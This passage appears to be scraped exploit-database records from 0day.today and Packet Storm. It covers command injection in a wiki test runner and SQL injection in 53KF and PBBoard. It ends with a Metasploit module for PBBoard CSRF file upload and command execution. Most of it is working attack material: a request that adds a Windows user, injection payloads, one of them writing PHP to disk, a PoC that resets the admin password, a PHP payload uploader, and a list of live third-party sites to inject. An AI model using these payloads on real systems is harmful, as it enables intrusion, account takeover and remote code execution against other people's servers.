This vulnerability\r\ncould be exploited by remote attackers to introduce external commands\r\ninto the workflow of the application that would execute them.\r\n\r\nExploit\r\n\r\nAfter creating a new page in the wiki (or editing already existing page) sending a request similar to below would trigger the vulnerability:\r\n\r\nPOST /<any page> HTTP/1.1\r\nHost: <host>:<port>\r\nProxy-Connection: keep-alive\r\nContent-Length: 374\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nOrigin: http://<host>:<port>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nDNT: 1\r\nReferer: http://<host>:<port>/<page>?edit\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: textwrapon=false; wysiwyg=textarea\r\n\r\neditTime=1384209902568&ticketId=-7153973663219190464&responder=saveData&helpText=&suites=&__EDITOR__1=textarea&pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&save=Save\r\n\r\nAfter editing the page with content specified above, the vulnerability could be triggered by visiting \u2018http://<host>:<port>/<created/edited page name>?test\u2019\r\n\r\n\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21972"}, {"lastseen": "2018-04-13T07:48:22", "references": [], "description": "Exploit for asp platform in category web applications", "edition": 2, "reporter": "The Black Devils", "published": "2012-12-04T00:00:00", "title": "53KF sql 
injection Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-13T07:48:22", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-12-04T00:00:00", "id": "1337DAY-ID-19883", "href": "https://0day.today/exploit/description/19883", "sourceData": "# Exploit Title: 53KF sql injection Vulnerability\r\n# Date: 05/10/2012\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Software Link: http://www.53kf.com/\r\n# Category : [ webapps ]\r\n# Dork : use google\r\n# Type : asp\r\n# Tested on: [Windows] & [Ubuntu]\r\n\r\n-------------------------------\r\n\r\nhttp:\\Localhost\\[Path]\\shop.asp?id= sql injection\r\n\r\n-------------------------------\r\n\r\n# Demo site:\r\nhttp://www.fenhong123.com/eshop/shop.asp?id=1796'\r\nhttp://www.51sxh.com/shop.asp?id=1216'\r\nhttp://www.firstaidkitsaustralia.com.au/shop.asp?id=1'\r\n\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19883"}, {"lastseen": "2018-03-20T05:20:34", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "High-Tech Bridge", "published": "2012-08-11T00:00:00", "title": "PBBoard 2.1.4 SQL Injection / Improper Authentication / Broken Access Control", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T05:20:34", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-08-11T00:00:00", "id": "1337DAY-ID-19165", "href": "https://0day.today/exploit/description/19165", "sourceData": "Vendor: www.pbboard.com\r\nVulnerable Version(s): 2.1.4 and probably prior\r\nTested Version: 2.1.4\r\nVendor Notification: July 18, 2012 \r\nPublic Disclosure: August 8, 2012 
\r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284]\r\nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application.\r\n\r\n\r\n1) Multiple SQL Injections in PBBoard: CVE-2012-4034\r\n\r\n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n 1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC 
demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" 
and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"hidden\" name=\"check[]\" value=\"1\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"hidden\" name=\"new_password\" value=\"1\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" 
name=\"subjectid\" value=\"' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \r\n\r\n\r\n2) Improper Authentication in PBBoard: CVE-2012-4035\r\n\r\nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script.\r\n\r\nThe following PoC changes password for the user with ID=1 (forum administrator):\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"member_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"new_password\" value=\"new_password\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n\r\n3) Improper Access Control in PBBoard: CVE-2012-4036\r\n\r\nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file.\r\n\r\nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration.\r\n\r\nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"context\" value='<? 
phpinfo(); ?>'>\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of this vulnerability requires administrative privileges; however, it can also be exploited via a CSRF vector (CVE-2012-1216). As of the vendor notification date, the CSRF vulnerability had not been patched. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply 5-8-2012 Security Patch\r\n\r\nMore Information:\r\nhttp://www.pbboard.com/forums/t10352.html\r\nhttp://www.pbboard.com/forums/t10353.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19165"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:29", "references": [], "edition": 1, "description": "", "reporter": "KedAns-Dz", "published": "2012-05-29T00:00:00", "type": "packetstorm", "title": "PBBoard 2.1.4 Cross Site Request Forgery", "enchantments": {"score": {"modified": "2016-12-05T22:19:29", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/", "value": 9.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1216"], "modified": "2012-05-29T00:00:00", "href": "https://packetstormsecurity.com/files/113109/PBBoard-2.1.4-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:113109", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by 
exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Site : 1337day.com 0 \n1 [+] Support e-mail : submit[at]1337day.com 1 \n0 0 \n1 ######################################### 1 \n0 I'm KedAns-Dz member from Inj3ct0r Team 1 \n1 ######################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n### \n# Title : PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF) \n# Author : KedAns-Dz \n# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) \n# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) \n# Web Site : www.1337day.com | www.inj3ct0rs.com \n# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d \n# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com \n# platform : php \n# Type : Metasploit -Remote Exploit- \n# Security Risk : Critical \n# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 \n### \n \n## \n# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | \n# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | \n# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | \n# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | \n# | ------------------------------------------------- < | \n## \n \n# <3 <3 Greetings t0 Palestine <3 <3 \n \n# Download : [http://github.com/downloads/PhpMax/PBBoard/PBBoard_v2_1_4.zip] \n \n######## (!) References => \n# _______________ \n# | CVE-2012-1216 | \n# | OSVDB-79218 | \n# | 1337ID-17520 | \n# | PS-SEC-109706 | \n# | CWE-352 | \n# --------------- \n# \n######## (!) 
Exploit ====> \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution\", \n'Description' => %q{ \nThis module exploits multiple cross-site request forgery (CSRF) vulnerabilities \nin admin.php in PBBoard 2.1.4 that allow remote attackers to hijack the authentication \nof administrators for requests that upload a file via an add action. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'KedAns-Dz <ked-h[at]1337day.com>', # Discovery PoC ,and Metasploit module \n], \n'References' => \n[ \n['CVE', '2012-1216'], \n['OSVDB', '79218'], \n['URL', 'http://1337day.com/exploits/17520'], # 1337ID-17520 \n['URL', 'http://secunia.com/advisories/47948/'], # SA47948 \n['URL', 'http://packetstormsecurity.org/files/109706/PBBoard-2.1.4-Cross-Site-Request-Forgery-Shell-Upload.html'] # PS-SEC-109706 \n# CWE-352 \n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1216 \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['PBBoard v2.1.4', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Feb 12 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to PBBoard', '/PBBoard v2.1.4']) \n], self.class) \nend \n \ndef check \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}admin.php\" \n}) \n \nif res and res.code == 200 and res.body.empty? 
\nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php' \n \npost_data = \"--1337day\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\" \npost_data << \"Content-Type : text/html;\\r\\n\" \npost_data << \"<?php \" \npost_data << payload.encoded \npost_data << \" ?>\\r\\n\" \npost_data << \"--1337day\\r\\n\" \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}admin.php?page=pages&add=1&start=1\", \n'ctype' => 'multipart/form-data; boundary=1337day', \n'data' => post_data \n}) \n \nif not res or res.code != 200 or res.body !~ /#{payload_name}/ \nprint_error(\"#{peer} - I don't think the file was uploaded !\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}#{payload_name}\" \n}) \n \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returns #{res.code.to_s}\") \nend \nend \n \n############# << ThE|End \n \n#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== \n# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w \n# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) \n# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection \n# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore \n# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke \n# JF * 
Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE \n# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs .. \n#===========================================================================================================`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113109/pbboard-mcsrf-fu-cexe.rb.txt"}]}}